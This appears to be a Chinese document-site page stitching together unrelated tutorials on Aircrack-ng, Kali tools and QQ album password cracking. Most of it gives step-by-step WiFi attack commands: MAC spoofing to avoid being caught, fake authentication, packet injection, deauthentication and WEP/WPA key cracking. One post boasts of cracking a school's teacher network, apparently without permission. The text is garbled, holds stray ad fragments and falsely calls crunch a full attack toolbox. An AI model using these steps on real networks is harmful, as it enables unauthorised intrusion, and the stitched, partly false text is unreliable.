Aircrack-ng使用命令
- 格式:doc
- 大小:47.00 KB
- 文档页数:7
一、什么是airodump-ngairodump-ng 是一个无线网络数据包捕获工具,它是Aircrack-ng套装中的一个重要组件。
它的主要功能是捕获802.11协议无线网络的数据包,并对这些数据包进行分析,从而帮助用户识别和解决无线网络中的安全问题。
二、airodump-ng 的主要功能1. 无线网络数据包捕获:airodump-ng 可以监听周围的无线网络,捕获数据包并存储在文件中,以备进一步分析和破解。
2. 信道扫描:airodump-ng 可以扫描周围的无线网络,并列出每个网络所使用的信道信息,帮助用户选择最佳的信道设置。
3. 客户端监视:airodump-ng 可以监视周围的客户端设备,并显示它们与无线网络的关联情况,包括MAC位置区域、信号强度、数据流量等信息。
4. 渗透测试:airodump-ng 还可以配合Aircrack-ng套装中的其他工具,对无线网络进行渗透测试,识别和利用网络中的安全漏洞。
三、airodump-ng 的用法1. 监视无线网络使用airodump-ng 命令加上无线网卡的名字,可以开始监视周围的无线网络:```airodump-ng wlan0```这条命令会列出周围所有可用的无线网络,并实时更新它们的信息,包括信号强度、加密类型、MAC位置区域等。
2. 捕获数据包使用airodump-ng 命令加上需要监视的无线网络的SSID和信道信息,可以开始捕获该无线网络的数据包:```airodump-ng --bssid 00:11:22:33:44:55 --channel 6 wlan0```这条命令会将捕获到的数据包保存在一个文件中,用户可以稍后使用其他工具对这些数据包进行进一步分析。
3. 客户端监视使用airodump-ng 命令加上无线网络的BSSID信息,可以开始监视该无线网络的客户端设备:```airodump-ng --bssid 00:11:22:33:44:55 wlan0```这条命令会列出当前与该无线网络关联的客户端设备,并实时更新它们的信息,包括MAC位置区域、信号强度、数据流量等。
由于在Windows环境下不能如Linux环境般直接调用无线网卡,所以需要使用其他工具将无线网卡载入,以便攻击工具能够正常使用。
在无线攻击套装Aircrack-ng的Windows版本下内置了这样的工具,就是airserv-ng。
步骤1:打开CMD,通过cd命令进入到aircrack-ng for Windows版本所在目录,输入airserv-ng,可以看到如图5-29所示的内容。
图5-29 在CMD下运行airserv-ng参数解释:* -p,指定监听的端口,即提供连接服务的端口,默认为666;* -d,载入无线网卡设备,需要驱动支持;* -c,指定启动工作频道,一般设置为预攻击AP的工作频道,默认为1;* -v,调试级别设定。
作为Windows下的破解,第一步就是使用airserv-ng来载入我们当前使用的无线网卡,为后续破解做准备,命令如下(注意:在命令中出现的引号一律使用英文下的引号输入):airserv-ng -d "|debug"或者airserv-ng -d "| {my adapter id}"输入完成后airserv-ng会自动搜寻现有无线网卡,会有提示,选择正确的无线网卡直接输入y,此时airserv-ng就在正常载入驱动后,同时开始监听本地的666端口。
换句话说,airserv-ng提供的是该无线网卡的网络服务,其他计算机上的用户也可以连接到这个端口来使用这块网卡,如图5-30所示。
图5-30 airserv-ng工作中步骤2:现在可以使用airodump-ng来搜索当前无线环境了。
注意,要另开启一个CMD,再输入如下命令:airodump-ng :666这里在IP地址处输入为本机即,端口采用的是默认的666。
图5-31 在CMD下运行airodump-ng如图5-31所示,当确定预攻击目标AP的频道后,使用组合键Ctrl + C中断,即可使用如下参数来精确定位目标:airodump-ng --channel number -w filename这里输入“airodump-ng --channel 7 -w onewpa ,回车后可看到如图5-32所示的内容。
kali linux 工具使用中文说明书Kali Linux是一款广泛用于渗透测试和网络安全的操作系统。
它集成了大量的安全工具,为安全研究人员和渗透测试人员提供了强大的功能。
以下是一些常用的Kali Linux工具及其使用说明:1. Nmap:网络扫描工具,用于探测目标主机的开放端口和服务。
使用命令`nmap <目标IP>`来进行扫描,并且可以使用不同的选项来控制扫描的深度和范围。
2. Metasploit Framework:一个强大的漏洞利用工具集,用于测试网络的安全性。
它可以自动化地执行漏洞利用过程,并提供了广泛的漏洞检测和利用模块。
3. Wireshark:网络分析工具,用于捕获和分析网络流量。
它可以解析各种协议,并提供详细的网络数据包分析。
4. Aircrack-ng:无线网络安全工具,用于破解WEP和WPA/WPA2-PSK 密码。
它可以通过捕获无线网络流量来破解密码。
5. Burp Suite:用于Web应用程序渗透测试的集成平台。
它具有代理服务器、漏洞扫描器和攻击工具等功能,可用于检测和利用Web应用程序中的漏洞。
6. John the Ripper:密码破解工具,用于破解各种类型的哈希密码。
它支持多种破解模式和密码破解技术。
7. Hydra:网络登录破解工具,可以通过暴力破解或字典攻击来破解各种网络服务的登录密码。
8. Sqlmap:用于自动化SQL注入检测和利用的工具。
它可以检测并利用Web应用程序中的SQL注入漏洞,从而获取数据库信息。
9. Maltego:开源情报和网络侦查工具,用于收集目标信息并绘制其关系图。
它可以从多个公共和私人数据源中获取信息,并帮助分析人员理解目标的结构和关联。
10. Nikto:Web服务器漏洞扫描工具,用于检测Web服务器上的常见漏洞和配置错误。
它可以扫描目标网站,并提供详细的漏洞报告。
以上只是Kali Linux中的一小部分工具,还有很多其他功能强大的工具可供使用。
在Mac 下面使用Aircrack-ng 要解决的两个问题:Aircrack-ng 在Mac 下如何安装?使用airport 而不是Aircrack-ng 中的工具获取握手包。
1. Aircrack-ng 在Mac 下编译的问题。
直接使用make 源码有问题,可以使用Macport 进行安装。
Macport 已经预置了Aircrack-ng ,brew 没有。
安装好Macport 之后,命令行下:sudo port install
aircrack-ng, Macport 会自动下载编译和安装。
2. 获取握手包的问题。
Mac 下面使用Aircrack-ng 包中的airmon-ng 进行嗅探有问题,会提示wireless-tools 找不到,因为Airmon-ng 依赖于wireless-tools ,而Linux wireless-tools 在Mac 下
的编译也有问题。
如果使用wireshark 的Mon mode 的话也有问题,wireshark 的监听模式认为Mac 的网卡不支持监听模式。
其实Mac 本身自带一个airport 工具,可以很方便的扫描和在监听模式下进行监听: airport -s 进行扫描,airport en1 sniff 1 进行监听。
具体可以参考下面这篇文章:airport –极少人知道的命令行无线工具
我在测试Aircrack-ng 的时候使用的是Mountain Lion 系统,其他系统没有试过。
广告气球/,吹膜机/。
QQ相册密码破解简介QQ相册是腾讯QQ提供的一个图片存储与分享平台,用户可以将照片上传至相册并设置访问密码。
然而,有时候我们可能会忘记或丢失相册密码,这就需要通过某种方法进行密码破解。
本文将介绍一种基于暴力破解的方法来破解QQ相册密码。
暴力破解暴力破解是一种通过尝试所有可能的密码组合来找到正确密码的方法。
虽然暴力破解在理论上是可行的,但实际上需要消耗大量的计算资源和时间。
对于相对简单的密码来说,暴力破解可能会比较快速地找到正确密码,但对于复杂的密码,暴力破解可能需要数小时或数天。
破解工具在进行QQ相册密码破解之前,我们需要使用一些破解工具来加速密码破解的过程。
以下是一些常用的暴力破解工具:1.John the Ripper: John the Ripper是一个流行的开源密码破解工具,它支持多种密码哈希算法。
它可以通过使用字典攻击和暴力破解的方式来找到密码。
2.Hashcat: Hashcat是一款功能强大的密码破解工具,它支持多种密码哈希算法,包括MD5、SHA1、SHA256等。
它可以在GPU上进行并行计算,提高密码破解的速度。
3.Aircrack-ng: Aircrack-ng是一个用于无线网络安全研究的套件,其中包含了一款强大的密码破解工具。
它可以用于暴力破解WiFi密码,也可以用于破解其他类型的密码。
破解步骤下面是使用John the Ripper进行QQ相册密码破解的步骤:1.安装John the Ripper: 首先,我们需要从John the Ripper的官方网站下载并安装这个工具。
安装过程可能因操作系统而异,因此请根据具体的安装说明进行操作。
2.获取密码哈希: 在开始破解之前,我们需要获取到要破解的QQ相册密码的哈希值。
可以通过各种方式获取到密码哈希,例如使用网络爬虫技术获取到已加密的密码哈希。
3.创建字典文件: 字典文件包含了我们要尝试的所有密码组合。
可以使用一些现有的字典文件,也可以自己创建字典文件。
Aircrack-ng使用命令Aircrack-ng工具包有很多工具,我用到的工具主要有以下几个:airmon-ng 处理网卡工作模式airodump-ng 抓包aircrack-ng 破解aireplay-ng 发包,干扰另外还要用到以下 linux 命令:ifconfig 查看修改网卡状态和参数macchanger 伪造 MACiwconfig 主要针对无线网卡的工具 (同 ifconfig)iwlist 获取无线网络的更详细信息另外还有其他的 linux 基本命令,我就不提示了。
具体破解步骤:1. 修改无线网卡状态:先 down 掉2. 伪造无线网卡的 MAC 地址:安全起见,减少被抓到的可能3. 修改网卡工作模式:进入Monitor状态,会产生一个虚拟的网卡4. 修改无线网卡状态: up5. 查看网络状态,记录下 AP 的 MAC 和本机的 MAC ,确定攻击目标6. 监听抓包:生成 .cap 或 .ivs7. 干扰无线网络:截取无线数据包,发送垃圾数据包,用来获得更多的有效数据包8. 破解 .cap 或 .ivs ,获得 WEP 密码,完成破解下面详细介绍一下各个命令的基本用法(参照命令的英文说明)1. ifconfig用来配置网卡,我们这里主要用来禁用和启用网卡:ifconfig ath0 downifconfig ath0 up禁用一下网卡的目的是为了下一步修改 MAC 。
2.macchanger用来改变网卡的 MAC 地址,具体用法如下:usage: macchanger [options] device-h 显示帮助-V 显示版本-s 显示当前MAC-e 不改变mac,使用硬件厂商写入的MAC-a 自动生成一个同类型的MAC,同厂商的-A 自动生成一个不同类型的MAC,不同厂商的-r 生成任意MAC-l 显示已知厂商的网卡MAC地址分配,这个很有用,可以根据MAC查出来是哪个厂商生产的产品-m 设置一个自定义的MAC 如: macchanger --mac=00:34:00:00:00:00 ath0 。
aircrack-ng详细教程/download.php?id=529&ResourceID=313教程:1、启动无线网卡的监控模式,在终端中输入:sudo airmon-ng start wlan0 (wlan0是无线网卡的端口,可在终端中输入ifconfig 查看)2、查看无线AP在终端中输入:sudo airodump-ng mon0(特别说明:启动监控模式后无线网的端口现在是mon0 !!!)看看有哪些采用wep加密的AP在线,然后按ctrl+c 退出,保留终端3、抓包另开一个终端,输入:sudo airodump-ng -c 6 --bssid AP's MAC -w wep mon0(-c 后面跟着的6是要破解的AP工作频道,--bissid后面跟着的AP'sMAC是要欲破解AP的MAC地址,-w后面跟着wep的是抓下来的数据包DATA保存的文件名,具体情况根据步骤2里面的在线AP更改频道和MAC地址,DATA保存的文件名可随便命名)4、与AP建立虚拟连接再另开一个终端,输入:sudo aireplay-ng -1 0 -a AP's MAC -h My MAC mon0(-h后面跟着的My MAC是自己的无线网卡的MAC地址,命令:iwlist wlan0 scanning可查看自己的MAC地址;自己的MAC 地址为ifconfig命令下wlan0对应的mac 地址)5、进行注入成功建立虚拟连接后输入:sudo aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b AP's MAC -h My MAC mon0 现在回头看下步骤3的终端是不是DATA在开始飞涨!(那串ff照抄就行)6、解密收集有15000个以上的DATA之后,另开一个终端,输入:sudo aircrack-ng wep*.cap进行解密(如果没算出来的话,继续等,aircrack-ng 会在DATA每增加多15000个之后就自动再运行,直到算出密码为至,注意此处文件的名字要与步骤3里面设置的名字一样,且*号是必需的)7、收工破解出密码后在终端中输入 sudo airmon-ng stop mon0 关闭监控模式,不然无线网卡会一直向刚刚的AP进行注入的,用ctrl+c退出或者直接关闭终端都是不行的。
获得WPA\WPA2 握手包的方法有很多,下面介绍通过aircrack-ng工具包来载获握手数据包。
1、下载aircrack-ng工具包。
2、终端里输入 sudo airmon-ng start wlan0 启动数据监控模式。
3、终端里输入 sudo airodump -w wpa mon0 ( 此时监控端口应该为 mon0 ,DATA 保存到以wpa命名的文件中了)。
这时大家就可以看到要抓包的AP DATA为0 4、依次:网络连接图标->点鼠标左键->鼠标移到要抓取握手数据包的AP上面点左键->。
5、这时AP会提示你填入密码,随便填几个数字或字母进去(注:但必需是八位,如:AAAAAAAA OR 88888888),然后点击连接。
6、现在可以看到网络连接正在尝试连接无线AP,回头看下步骤3的终端,DATA 已经变为4个了。
7、再打开一个新的终端,输入 sudo aircrack-ng wpa*.cap 会看到里面有一个握手包了。
就是这么简单的了~!一、关于EWSAEWSA (全称是: Elcomsoft Wireless Security Auditor) 由俄罗斯安全公司Elcomsoft出品。
该软件特点是:利用GPU的运算性能快速攻破无线网络WPA-PSK 及WPA2-PSK密码,运算速度相比单独使用CPU可提高最多上百倍。
二、安装安装过程十分简单,下载EWSA,双击setup.exe后选择英文,后即可见到安装向导。
基本上就是一路[Next]就可以安装好。
安装好后头一次运行软件会提示为DEMO版本,等15秒以后会自动进入程序。
三、支持的显卡1、NVIDIA显卡GeForce 8, 9, 200 Series及更高版本 (至少256MB显存)、Quadro FX 4600以后推出的专业绘图卡、TESLA C870,D870,S870,C1060,S1070需要特别注意的是GeForce 8xxx以后所推出的绘图卡须安装CUDA 182.22以后版本的驱动程序。
aircrack使用技巧Aircrack-ng是一个用于无线网络安全测试的套件,主要用于评估Wi-Fi网络的安全性。
在使用Aircrack-ng时,需要遵循道德准则,仅在拥有授权的网络上进行测试。
以下是一些Aircrack-ng的基本使用技巧:1. 收集数据包(Capture Packets):-使用`airodump-ng`命令来捕获Wi-Fi流量。
```bashairodump-ng wlan0```-选择要攻击的目标网络并记下BSSID和频道。
2. 抓取握手包(Capture Handshake):-使用`airodump-ng`来捕获握手包。
这是为了破解Wi-Fi密码而必需的步骤。
```bashairodump-ng --bssid <目标BSSID> -c <频道号> -w <输出文件名> wlan0```-等待直到收集到握手包,然后按`Ctrl+C`停止。
3. 破解密码(Crack Password):-使用`aircrack-ng`来破解密码。
需要提供包含握手包的.cap文件。
```bashaircrack-ng -a2 -b <目标BSSID> -w <字典文件> <捕获文件-01.cap>```4. 使用字典攻击(Dictionary Attack):-在破解密码时,你可以使用字典文件。
Aircrack-ng会尝试使用字典中的每个单词来破解密码。
-常用的字典文件包括Rockyou.txt等,你可以在互联网上找到或使用Kali Linux自带的。
5. 使用更强大的字典和规则:-使用更大、更复杂的字典文件以增加破解成功的可能性。
-使用密码破解规则,例如使用`hashcat`生成的规则文件,来提高成功率。
6. 使用GPU进行加速:-如果你有支持GPU的硬件,可以考虑使用GPU进行密码破解,这可以显著提高破解速度。
学校教学区最近普及教师网络,听说下载每秒几M的速度下午尝试破解了一下密码把方法分享给有需要的榴友们```用的是ubuntu系统,没用linux系统的至少要在WIN里面安装ubuntu。
1、安装aircrack-ng在终端中输入sudo apt-getinstall aircrack-ng2 、启动无线网卡的监控模式,在终端中输入:sudo airmon-ngstart wlan03 、看看有哪些无线路由在工作,在终端中输入:sudo airodump-ngmon0然后按ctrl+c 退出,保留终端。
4 、抓包,另开一个终端,输入:sudo airodump-ng -c 6--bssid 11:22:33:44: 55:66 -w wep mon0(-c 后面跟着的6是要破解的路由器的工作频道,--bissid后面跟着的11:22:33: 44:55:66是欲破解无线路由的MAC地址,-w后面跟着的是抓下来的数据包的文件名,在步骤2可以查看正在工作的无线路由的频道和MAC地址,保存的文件名可随便命名)5 、注入破解的话要与目标路由器建立虚拟连接,再另开一个终端,输入:sudo aireplay-ng -1 0 -a 11:22:33:44:55:66 -haa:bb:cc:dd:ee:ff mon0(-h后面跟着的aa:bb:cc:dd:ee:ff 是自己的无线网卡的MAC地址),如果不知道可以在终端输入ifconfig 查看。
6 、成功建立虚拟连接后输入:sudo aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b11:22:33:44:55:66 -h aa:b b:cc:dd:ee:ff mon0进行注入,注入破解是为了加快抓包的速度。
7 、收集15000(用Bt4破解时的收集数据的个数)个以上的数据之后,另开一个终端,输入:sudo aircrack-ng wep*.cap ,进行解密。
aircrack使用方法Aircrack是一个用于破解无线网络密码的工具,其使用方法如下:1. 修改无线网卡状态:首先需要将无线网卡设置为监听模式,以便捕获无线网络的数据包。
可以使用命令“airmon-ng start wlan0”来启动无线网卡的监听模式,其中“wlan0”是无线网卡的名称。
2. 伪造无线网卡的MAC地址:为了安全起见,可以伪造无线网卡的MAC 地址,以减少被检测到的可能性。
可以使用命令“macchanger -mxx:xx:xx:xx:xx:xx wlan0”来更改无线网卡的MAC地址,其中“xx:xx:xx:xx:xx:xx”是新的MAC地址。
3. 修改网卡工作模式:进入Monitor模式,会产生一个虚拟的网卡。
可以使用命令“ifconfig wlan0 down”和“ifconfig wlan0 up”来关闭和启动无线网卡。
4. 查看网络状态:使用命令“iwconfig”查看无线网络的状态,记录下目标AP的MAC地址和本机的MAC地址,确定攻击目标。
5. 监听抓包:使用命令“airodump-ng wlan0mon”来监听数据包,其中“wlan0mon”是虚拟的网卡名称。
6. 干扰无线网络:截取无线数据包,发送垃圾数据包,用来获得更多的有效数据包。
可以使用命令“aireplay-ng -0 0 -a [AP MAC] -c [Client MAC] wlan0mon”来攻击客户端,使客户端重新连接,从而抓取更多的数据包。
7. 破解抓取的数据包:使用Aircrack对抓取的数据包进行破解,获取无线网络的密码。
可以使用命令“aircrack -w [字典] [握手包路径]”来破解握手包。
需要注意的是,破解无线网络密码需要具备一定的技术知识和经验,同时也需要遵守法律法规和道德准则。
在进行破解操作之前,请确保您已经获得了合法的授权和许可。
一.简介Aircrack-ng是一个与802.11标准的无线网络分析有关的安全软件,主要功能有:网络侦测,数据包嗅探,WEP和WPA/WPA2-PSK破解。
Aircrack-ng可以工作在任何支持监听模式的无线网卡上(设备列表请参阅其官方网站)并嗅探802.11a,802.11b,802.11g的数据。
该程序可运行在Linux和Windows上。
Linux版本已经被移植到了Zaurus 和Maemo系统平台, 并概念验证可移植到iPhone。
二.主要工具1.airmon-ng处理网卡工作模式2.airodump-ng抓包3.aireplay-ng发包,干扰4.aircrack-ng破解三.具体1.airmon-ng启动无线网卡进入Monitor模式,useage:airmon-ng<start|stop|check><interface>[channel]<start|stop|check>:启动,停止,检测<interface>:指定无线网卡[channel]:监听频道,现代大多数无线路由默认是6,随便扫描一下都是这个频道,网管们应该换换了2.airodump-ng抓包工具,我最喜欢用的,详细用法如下:usage:airodump-ng<options><interface>[,<interface>,...]Options:–ivs:仅将抓取信息保存为.ivs–write<prefix>:保存为指定日文件名,我一般用这个,尤其是多个网络时,指定了也好区分–beacons:保存所有的beacons,默认情况况下是丢弃那些无用的数据包的Filteroptions:–encrypt<suite>:使用密码序列过滤AP–netmask<netmask>:使用掩码过滤AP–bssid<bssid>:使用bssid过滤AP-a:过滤无关的客户端–help:显示使用方法,翻译到这里,感觉还是英文的贴切一点,建议读原文3.aireplay-ng搞破坏的工具,注意杀伤力很大,甚至可以损坏劣质的AP设备(小内存的路由器可能会重启,或者彻底被破坏掉),我很喜欢这个东西,相信你也会喜欢的,使用时注意分寸.usage:aireplay-ng<options><replayinterface>Filteroptions:-bbssid:AP的MAC-ddmac:目标的MAC-ssmac:来源的MAC-mlen:最小包长度-nlen:最大包长度-D:禁用AP发现功能Replayoptions:-xnbpps:每秒包数量-pfctrl:框架设定(hex)-abssid:设置AP的mac-cdmac:设置目标的MAC-hsmac:设置来源的mac-gvalue:改变环缓存大小(默认8)Fakeauthattackoptions:-eessid:设置目标AP的SSID-onpckts:每秒爆破的包数量(0自动,默认1)-qsec:存活时间秒-yprga:共享可信的key流–help:显示这个帮助,这部分是全部依照我的使用来翻译,没有完全准确的翻译,主要对付那些不给出作者就引用的人,鄙视抄袭.4.aircrack-ng破解KEY,漫长的过程.漫不漫长取决于两个方面:一是网管的聪明程度(能否设置出复杂的密码),二是电脑的速度.usage:aircrack-ng[options]<.cap/.ivsfile(s)>Commonoptions:-a<amode>:暴破(1/WEP,2/WPA-PSK)-e<essid>:选择essid为目标-b<bssid>:选择ap的mac为目标,就是破解识别的关键字-q:使用安静模式,无数出模式-C<macs>:将所有的AP合并为一个虚拟的–help:显示这个帮助。
Aircrack-ng使用简介使用Aircrack-ng破解WEP加密无线网络首先讲述破解采用WEP加密内容,启用此类型加密的无线网络往往已被列出严重不安全的网络环境之一。
而Aircrack-ng正是破解此类加密的强力武器中的首选,关于使用Aircrack-ng套装破解WEP加密的具体步骤如下。
步骤1:载入无线网卡其实很多新人们老是在开始载入网卡的时候出现一些疑惑,所以我们就把这个基本的操作仔细看看。
首先查看当前已经载入的网卡有哪些,输入命令如下:ifconfig回车后可以看到如下图3所示内容,我们可以看到这里面除了eth0之外,并没有无线网卡。
确保已经正确插入USB或者PCMCIA型无线网卡,此时,为了查看无线网卡是否已经正确连接至系统,应输入:ifconfig -a如下图4所示,我们可以看到和上图3相比,出现了名为wlan0的无线网卡,这说明无线网卡已经被BackTrack4 R2 Linux识别。
既然已经识别出来了,那么接下来就可以激活无线网卡了。
说明一下,无论是有线还是无线网络适配器,都需要激活,否则是无法使用滴。
这步就相当于Windows下将“本地连接”启用一样,不启用的连接是无法使用的。
在上图4中可以看到,出现了名为wlan0的无线网卡,OK,下面输入:ifconfig wlan0 up参数解释:up 用于加载网卡的,这里我们来将已经插入到笔记本的无线网卡载入驱动。
在载入完毕后,我们可以再次使用ifconfig进行确认。
如下图5所示,此时,系统已经正确识别出无线网卡了。
当然,通过输入iwconfig查看也是可以滴。
这个命令专用于查看无线网卡,不像ifconfig那样查看所有适配器。
iwconfig该命令在Linux下用于查看有无无线网卡以及当前无线网卡状态。
如下图6所示。
步骤2:激活无线网卡至monitor即监听模式对于很多小黑来说,应该都用过各式各样的嗅探工具来抓取密码之类的数据报文。
kali crunch用法Kali Crunch是一款非常实用的工具箱,它被广泛地应用在网络安全方面。
该工具箱集成了各种工具和软件,可以帮助用户进行渗透测试、密码破解、渗透攻击等操作。
本文将围绕Kali Crunch的使用方法进行阐述,以便初学者更好地了解和使用该工具箱。
步骤一:下载和安装Kali Crunch首先,需要从官方网站下载Kali Crunch。
在下载之前,需要选择适合自己电脑系统的版本。
下载完成后,按照官方指导进行安装。
步骤二:了解Kali Crunch的基本指令和操作Kali Crunch的基本指令和操作是掌握该工具箱的关键。
下面列举一些常用的指令和操作:1.生成密码字典:使用crunch命令,可以按照设定的规则生成密码字典。
例如,使用“crunch 8 10 ABCDEFG”命令,可以生成由8到10位大小写字母组成的密码字典。
2.爆破密码:使用aircrack-ng命令,可以爆破WiFi密码。
使用“aircrack-ng -w password.lst -e ESSID -b MAC_Address”命令,可以指定字典文件、WiFi名称和MAC地址进行爆破。
3.扫描网络:使用nmap命令,可以扫描网络。
使用“nmap -sP 192.168.1.0/24”命令,可以扫描该网段内的所有设备。
步骤三:了解Kali Crunch的应用场景和注意事项Kali Crunch的应用场景非常广泛,可以用于渗透测试、密码破解、渗透攻击等方面。
但同时也需要注意以下几点:1.不要非法使用:Kali Crunch是一款强大的工具箱,但切记不要用于非法活动或者侵犯他人隐私的行为。
2.注意安全:使用Kali Crunch需要格外注意安全问题。
建议在虚拟机环境下进行测试,以避免对真实环境造成损坏。
3.合理使用字典:使用密码字典是Kali Crunch的核心功能之一,但需要合理使用。
建议自己生成密码字典,不要使用他人分享的密码字典,以确保安全性。
aircrack-ng⽆线WIFI攻击0x01 安装 aircrack-ngkali⾃带sudo apt install aircrack-ng0x02 查看可⽤的⽆线⽹卡sudo airmon-ng0x03 指定⽆线⽹卡开启监听模式。
使⽤命令:airmon-ng start <⽹卡名称>sudo airmon-ng start wlp8s00x04 扫描附近的⽆线⽹络使⽤命令:airodump-ng <处于监听模式的⽹卡名称>sudo airodump-ng wlan0mon这⼀步会输出两个列表,两个列表不停在刷新。
第⼀个列表表⽰扫描到的⽆线⽹络 AP 信息,会⽤到以下⼏列信息:BSSID: ⽆线 AP 的硬件地址PWR: 信号强度,值是负数,绝对值越⼩表⽰信号越强CH: ⽆线⽹络信道ENC: 加密⽅式,我们要破解的是 WPA2ESSID: ⽆线⽹络的名称第⼆个列表表⽰某个⽆线⽹络中和⽤户设备的连接信息:BSSID: ⽆线 AP 的硬件地址STATION: ⽤户设备的硬件地址扫描列表会不停刷新,确定最终⽬标后按 Ctrl-C 退出。
0x05 使⽤参数过滤扫描列表,确定扫描⽬标使⽤命令:airodump-ng -w <扫描结果保存的⽂件名> -c <⽆线⽹络信道> --bssid <⽬标⽆线 AP 的硬件地址> <处于监听模式的⽹卡名称> netcon@conwlt:~/workspace$ sudo airodump-ng -w android -c 6 --bssid 22:47:DA:62:2A:F0 wlp8s0monCH 5 ][ Elapsed: 12 s ][ 2018-10-07 18:49 ][ WPA handshake: 22:47:DA:62:2A:F0BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID22:47:DA:62:2A:F0 -33 100 1597 387 11 6 54e. WPA2 CCMP PSK AndroidAPBSSID STATION PWR Rate Lost Frames Probe22:47:DA:62:2A:F0 AC:BC:32:96:31:8D -32 1e-24e 1691 2657刚扫描时看到输出的扫描状态是这样的:CH 5 ][ Elapsed: 12 s ][ 2018-10-07 18:49。
◆什么是Aircrack-ng
Aircrack-ng是一款用于破解无线802.11WEP及WPA-PSK加密的工具,该工具在2005年11月之前名字是Aircrack,在其2.41版本之后才改名为Aircrack-ng。
Aircrack-ng主要使用了两种攻击方式进行WEP破解:一种是FMS攻击,该攻击方式是以发现该WEP漏洞的研究人员名字(Scott Fluhrer、Itsik Mantin及Adi Shamir)所命名;另一种是KoreK攻击,经统计,该攻击方式的攻击效率要远高于FMS攻击。
当然,最新的版本又集成了更多种类型的攻击方式。
对于无线黑客而言,Aircrack-ng是一款必不可缺的无线攻击工具,可以说很大一部分无线攻击都依赖于它来完成;而对于无线安全人员而言,Aircrack-ng也是一款必备的无线安全检测工具,它可以帮助管理员进行无线网络密码的脆弱性检查及了解无线网络信号的分布情况,非常适合对企业进行无线安全审计时使用。
Aircrack-ng(注意大小写)是一个包含了多款工具的无线攻击审计套装,这里面很多工具在后面的内容中都会用到,具体见下表1为Aircrack-ng包含的组件具体列表。
表1
Aircrack-ng在 BackTrack4 R2下已经内置(下载BackTrack4 R2),具体调用方法如下图2所示:通过依次选择菜单中“Backtrack”—“Radio Network Analysis”—“80211”—“Cracking”—“Aircrack-ng ”,即可打开Aircrack-ng的主程序界面。
也可以直接打开一个Shell,在里面直接输入aircrack-ng命令回车也能看到aircrack-ng的使用参数帮助。
shell 1:—————————————-1.ifconfig -a<wlan0 … xx:xx:xx:xx:xx:xx>[macchanger -m 00:11:22:33:44:55 wlan0<修改自己网卡的MAC 地址。
当对方设置了MAC 地址过滤时或为了方便后面输入>]2.ifconfig -a wlan0 up(5100可能要加载网卡才支持注入?)3.airmon-ng start wlan0 6<monitor mode enabled on mon0>(6是频道)另一说5100要支持注入用airmon-ng start wlan0如果这里回显<(monitor mode enabled)> 则下面命令所有端口号要用”wlan0″[aireplay-ng -9 mon0 / aireplay-ng --test mon0<Injection is working/No anwser>(注入攻击成功/不成功)(检测你的网卡是否支持注入)]4.airodump-ng -w pack -c 6 mon0/wlan0(pack是随便起的获取的ivs的保存文件的名字)另一说用airodump-ng –ivs -w pack -c 6 mon0/wlan0shell 2:—————————————-一、有客户端:破解:abcd四种方式a.合法客户端产生大量有效的数据,能直接获得大量cap。
收到10000以上data后,直接转shell 3,破解密码b.合法客户端只能产生少量数据,就需要注入<-3>攻击加速产生大量数据。
5.aireplay-ng -3 -b 000000000000(APmac) -h 111111111111(合法客户端mac) mon0/wlan0(wlan0测试不行)<Read 11542 packets <got 12587 ARP …>,send 71524 packets … 很多类似行> c.合法客户端不在通信,注入模式不成功,用-0 冲突模式强制断开合法客户端和ap连接,使之重新连接,新连接所产生的握手数据让-3 获得有效的ARP从而完成ARP注入5.aireplay-ng -3 -b 000000000000(APmac) -h 111111111111(合法客户端mac) wlan06.aireplay-ng -0 10 -a 000000000000(APmac) -c 111111111111(合法客户端mac) wlan0(可能要另开窗)d.有客户端,并且客户端能产生有效arp 数据的另类破解方式输入modprobe –r iwl3945(加载网卡)输入modprobe ipwraw输入airmon-ng start wlan0 6现在,只要一个命令就搞定,输入:输入wesside-ng -i wlan0 -v 01:02:03:04:05:06<此格式的APmac>。
aircrack-ng的用法Aircrack-ng是一个用于无线网络渗透测试的工具套件,可用于破解WEP和WPA-PSK密码。
以下是使用Aircrack-ng的基本步骤:1. 扫描无线网络:运行`airmon-ng start <无线接口>`命令来启动监视模式。
然后使用`airodump-ng <无线接口>`来扫描周围的无线网络,收集有关网络的信息,如BSSID、通道、加密方式等。
2. 选择目标网络:选择要破解的目标网络,记录下其BSSID 和信道号。
3. 捕获数据包:在目标网络上运行以下命令来捕获数据包:```airodump-ng -c <信道号> --bssid <目标BSSID> -w <输出文件名> <无线接口>```该命令将在当前目录中创建一个或多个文件,用于捕获从目标网络发送的数据包。
4. 注入流量:打开一个新的终端窗口,并运行以下命令来注入流量:```aireplay-ng -0 0 -a <目标BSSID> <无线接口>```此命令将向目标网络发送伪造的数据包,以促使其生成更多的数据流量,以便进行破解。
5. 运行破解:在Aircrack-ng捕获到足够的数据包后,可以运行以下命令来破解密码:```aircrack-ng -a 2 -b <目标BSSID> -w <密码字典文件> <捕获文件>.cap```其中,`-a`参数指定破解WPA-PSK密码,`-b`参数指定目标BSSID,`-w`参数指定用于破解的密码字典文件,`<捕获文件>.cap`是之前捕获到的数据包文件。
以上是Aircrack-ng的基本使用步骤,但请注意,使用Aircrack-ng工具套件的目的必须是合法的,并遵守相关法律和道德准则。
渗透测试工具及其使用方法渗透测试是一种安全评估方法,用于评估与网络系统相关的安全薄弱点。
为了执行渗透测试,渗透测试人员需要使用一系列的渗透测试工具。
本文将介绍几种常用的渗透测试工具及其使用方法,以帮助初学者了解基本的渗透测试技术。
1. NmapNmap是一款开源的网络扫描工具,用于发现网络上的主机和开放的端口。
它可以识别系统中运行的服务、操作系统的类型以及所使用的版本。
Nmap使用非常简单,只需在终端中输入命令"nmap",后跟目标IP地址或域名。
例如,"nmap 192.168.0.1"将扫描该IP地址上的所有开放端口。
2. MetasploitMetasploit是一个强大的漏洞利用工具集,用于发现和利用目标系统的漏洞。
它提供了一系列的漏洞利用模块和有效载荷,以帮助渗透测试人员执行各种攻击。
Metasploit使用Ruby编程语言开发,并提供了用户友好的命令行界面。
使用Metasploit时,渗透测试人员可以通过选择合适的漏洞利用模块,配置有效载荷,并执行相应的攻击。
3. Burp SuiteBurp Suite是一款专业的Web应用程序渗透测试工具,广泛用于发现Web应用程序的漏洞。
它提供了一个功能强大的代理服务器,可以拦截、修改和重放Web 请求。
Burp Suite还提供了其他功能,如漏洞扫描、报告生成和自动化测试等。
